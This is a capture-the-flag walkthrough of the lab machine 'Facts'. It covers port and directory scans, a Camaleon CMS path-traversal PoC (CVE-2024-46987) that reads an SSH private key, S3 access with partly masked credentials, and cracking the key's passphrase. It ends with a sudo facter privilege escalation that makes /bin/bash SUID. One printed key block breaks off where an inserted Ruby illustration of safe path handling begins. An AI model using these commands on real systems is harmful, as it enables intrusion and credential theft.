Nmap #
[/home/kali/Facts]$ nmap facts.htb -A
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4d:d7:b2:8c:d4:df:57:9c:a4:2f:df:c6:e3:01:29:89 (ECDSA)
|_ 256 a3:ad:6b:2f:4a:bf:6f:48:ac:81:b9:45:3f:de:fb:87 (ED25519)
80/tcp open http nginx 1.26.3 (Ubuntu)
|_http-title: facts
|_http-server-header: nginx/1.26.3 (Ubuntu)
Camaleon CMS #
A directory scan turns up /admin (the redirect to /admin/login), and the asset paths under /assets/camaleon_cms/ and /assets/themes/camaleon_first/ identify the application as Camaleon CMS:
[/home/kali/Facts]$ feroxbuster -u 'http://facts.htb/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://facts.htb/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200 GET 124l 552w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 121l 443w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 69l 448w 30396c http://facts.htb/randomfacts/logopage2.png
200 GET 129l 132w 3508c http://facts.htb/sitemap
200 GET 8l 11w 183c http://facts.htb/rss
200 GET 66l 519w 44082c http://facts.htb/randomfacts/primary-question-mark.png
404 GET 2l 9w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 7l 10w 162c http://facts.htb/randomfacts/
404 GET 114l 371w 4836c http://facts.htb/fonts.googleapis.com/css
200 GET 271l 1166w 19187c http://facts.htb/search
200 GET 160l 773w 15365c http://facts.htb/finland-happiest
200 GET 172l 920w 19730c http://facts.htb/animal-ejected
200 GET 172l 913w 19727c http://facts.htb/first-impressions
200 GET 178l 965w 21754c http://facts.htb/dolphin-fact
404 GET 114l 371w 4836c http://facts.htb/fonts.googleapis.com/
200 GET 166l 833w 17324c http://facts.htb/anne-frank
200 GET 160l 721w 15004c http://facts.htb/animal-sweat
200 GET 160l 733w 14975c http://facts.htb/cute-animals
200 GET 172l 925w 19677c http://facts.htb/dark-chocolate
200 GET 64l 988w 206540c http://facts.htb/assets/camaleon_cms/image-not-found-fc3c0e66dc61abf74010e63ef65a2e23c4cb40a3320408f2711f82fdc22b503f.png
200 GET 172l 889w 19556c http://facts.htb/cats-attachment
200 GET 8l 2294w 169312c http://facts.htb/assets/themes/camaleon_first/assets/css/main-41052d2acf5add707cadf8d1c12a89a9daca83fb8178fdd5c9105dc6c566d25d.css
200 GET 9958l 40904w 330571c http://facts.htb/assets/themes/camaleon_first/assets/js/main-2d9adb006939c9873a62dff797c5fc28dff961487a2bb550824c5bc6b8dbb881.js
200 GET 281l 1177w 19593c http://facts.htb/page
302 GET 0l 0w 0c http://facts.htb/admin => http://facts.htb/admin/login
The CMS allows self-registration, so register an arbitrary account; the exploit below needs a logged-in user.
CVE-2024-46987 #
CVE-2024-46987 is an authenticated path traversal in Camaleon CMS's private-media download handler: any logged-in user can read any file the web server's account has permission to read. The PoC script takes the account registered above plus the target path, and user.txt in william's home directory comes straight out:
[main][/home/kali/Facts/CVE-2024-46987]$ python CVE-2024-46987.py -u http://facts.htb --user hyh -p hyh /home/william/user.txt
The same read also pulls the trivia user's SSH private key:
[main][/home/kali/Facts/CVE-2024-46987]$ python CVE-2024-46987.py -u http://facts.htb --user hyh -p hyh /home/trivia/.ssh/id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABAGlzSmdW
ZrLblO0eRPGK7YAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIKq8HjUGp82A3FsM
tm9O9XCpr91gUl6GxOoCiABwNEIIAAAAoFhsNkdNhHEAMcmYb+xau1Q+FpIEfRYcWIB1Tu
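To make the bug class concrete, here is an added illustration of what goes wrong in a "download private file" handler and how the check should look. This is example code, not Camaleon CMS source or the PoC script; the `PRIVATE_ROOT` directory and the sample request strings are constructed for the demonstration.

```ruby
# Added illustration of the CVE-2024-46987 bug class (path traversal in a
# "download private file" handler). Not Camaleon CMS code; PRIVATE_ROOT is a
# constructed example, not the CMS's real upload directory.
PRIVATE_ROOT = '/var/www/facts/private'

# Vulnerable pattern: join the user-supplied name onto the base directory and
# hand the result straight to the file API. Nothing stops "../" segments
# from walking out of PRIVATE_ROOT, which is exactly how /home/trivia/.ssh/
# id_ed25519 was read above.
def vulnerable_resolve(user_file)
  File.join(PRIVATE_ROOT, user_file)
end

# Hardened pattern: canonicalise first, then insist the result is strictly
# inside PRIVATE_ROOT. Returns nil for anything that escapes.
def safe_resolve(user_file)
  return nil if user_file.nil? || user_file.empty?
  return nil if user_file.include?("\0")   # NUL would truncate the path in C
  return nil if user_file.start_with?('~') # expand_path would resolve home dirs
  # An absolute user_file makes expand_path ignore PRIVATE_ROOT entirely;
  # the prefix check below catches that case too.
  candidate = File.expand_path(user_file, PRIVATE_ROOT)
  return nil unless candidate.start_with?(PRIVATE_ROOT + File::SEPARATOR)
  candidate
end

# Constructed sample of names a handler might receive: two legitimate ones,
# the traversal used on this box, an absolute path, and a bare "..".
SAMPLE_REQUESTS = [
  'reports/q1.pdf',
  'a/../b.txt',
  '../../../../home/trivia/.ssh/id_ed25519',
  '/etc/passwd',
  '..'
].freeze

# Returns only the requests the hardened check accepts, mapped to the
# canonical path that would actually be served.
def accepted_paths(requests = SAMPLE_REQUESTS)
  requests.each_with_object({}) do |req, acc|
    resolved = safe_resolve(req)
    acc[req] = resolved unless resolved.nil?
  end
end

if __FILE__ == $PROGRAM_NAME
  SAMPLE_REQUESTS.each do |req|
    puts format('%-42s vulnerable=%-62s safe=%s',
                req, vulnerable_resolve(req), safe_resolve(req).inspect)
  end
end
```

`File.expand_path` normalises `..` lexically but does not follow symlinks, so a symlink inside `PRIVATE_ROOT` that points outside it still needs a `Pathname#realpath` check against the same prefix at serve time. The 2.8.2 fix in Camaleon CMS addresses the same handler; the version of the check above is the generic form of that guard.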
AWS #
Alternatively, go back to the admin panel and keep digging: AWS-style credentials are stored there, and they work against an S3-compatible endpoint on port 54321.
[/home/kali/Facts]$ aws configure
AWS Access Key ID [None]: AKxxxxxxxxxx
AWS Secret Access Key [None]: 987zTmyfmQxxxxxxxxxxxx
Default region name [None]: us-east-1
Default output format [None]:
[/home/kali/Facts/s3-files]$ aws s3 ls --endpoint-url http://facts.htb:54321
2025-09-11 20:06:52 internal
2025-09-11 20:06:52 randomfacts
There are two buckets. The internal bucket is a copy of trivia's home directory, so the same private key can be fetched from it:
[/home/kali/Facts/s3-files]$ aws s3 ls s3://internal/ --endpoint-url http://facts.htb:54321
PRE .bundle/
PRE .cache/
PRE .ssh/
2026-01-09 02:45:13 220 .bash_logout
2026-01-09 02:45:13 3900 .bashrc
2026-01-09 02:47:17 20 .lesshst
2026-01-09 02:47:17 807 .profile
[/home/kali/Facts/s3-files]$ aws s3 cp s3://internal/.ssh/id_ed25519 ./ --endpoint-url http://facts.htb:54321
download: s3://internal/.ssh/id_ed25519 to ./id_ed25519
[/home/kali/Facts/s3-files]$ cat id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABAGlzSmdW
ZrLblO0eRPGK7YAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIKq8HjUGp82A3FsM
tm9O9XCpr91gUl6GxOoCiABwNEIIAAAAoFhsNkdNhHEAMcmYb+xau1Q+FpIEfRYcWIB1Tu
FQIcjI0K0ljydKEplJsOTY/fOQNS6R+QjL8JFXtxgPP5dO6+3o2exe2bVKAFJfkVcBFjDE
ssh2john #
The key is passphrase-protected, so it cannot be used to log in as-is; the passphrase has to be cracked with ssh2john and john. Note the john output: cost 2 means a bcrypt KDF, and 24 rounds is why it only manages about 50 guesses per second, so a small wordlist pays off here.
[/home/kali/Facts/s3-files]$ chmod 600 id_ed25519
[/home/kali/Facts/s3-files]$ ssh -i id_ed25519 trivia@facts.htb
The authenticity of host 'facts.htb (10.129.24.236)' can't be established.
ED25519 key fingerprint is SHA256:fygAnw6lqDbeHg2Y7cs39viVqxkQ6XKE0gkBD95fEzA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'facts.htb' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_ed25519':
[/home/kali/Facts/s3-files]$ ssh2john id_ed25519 >> ssh.hash
[/home/kali/Facts/s3-files]$ john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 24 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dragonballz (id_ed25519)
1g 0:00:01:04 DONE (2026-02-04 19:35) 0.01557g/s 49.84p/s 49.84c/s 49.84C/s billy1..imissu
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Logging in as trivia with that passphrase also gets user.txt.
Root #
Check sudo -l:
trivia@facts:/home/william$ sudo -l
Matching Defaults entries for trivia on facts:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User trivia may run the following commands on facts:
(ALL) NOPASSWD: /usr/bin/facter
Look at what the binary actually is; it is a Ruby wrapper script, not a compiled executable:
trivia@facts:/home/william$ file /usr/bin/facter
/usr/bin/facter: Ruby script, ASCII text executable
trivia@facts:/home/william$ cat /usr/bin/facter
#!/usr/bin/ruby
# frozen_string_literal: true
require 'pathname'
require 'facter/framework/cli/cli_launcher'
Facter::OptionsValidator.validate(ARGV)
processed_arguments = CliLauncher.prepare_arguments(ARGV)
CliLauncher.start(processed_arguments)
Simple: GTFOBins has an entry for it.
- facter | GTFOBins (https://gtfobins.github.io/gtfobins/facter/)
facter loads every Ruby file in the directory given by --custom-dir as a custom fact, and under sudo that Ruby runs as root, so a Ruby file in any writable directory is enough. Once /bin/bash carries the SUID bit, bash -p gives the root shell (plain bash drops the effective uid).
trivia@facts:/home/william$ mkdir -p /tmp/exploit_facts
trivia@facts:/home/william$ cd /tmp/exploit_facts/
trivia@facts:/tmp/exploit_facts$ cat > /tmp/exploit_facts/exploit.rb << 'EOF'
#!/usr/bin/env ruby
puts "custom_fact=exploited"
system("chmod +s /bin/bash")
EOF
trivia@facts:/tmp/exploit_facts$ sudo /usr/bin/facter --custom-dir=/tmp/exploit_facts/ x
custom_fact=exploited
trivia@facts:/tmp/exploit_facts$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1740896 Mar 5 2025 /bin/bash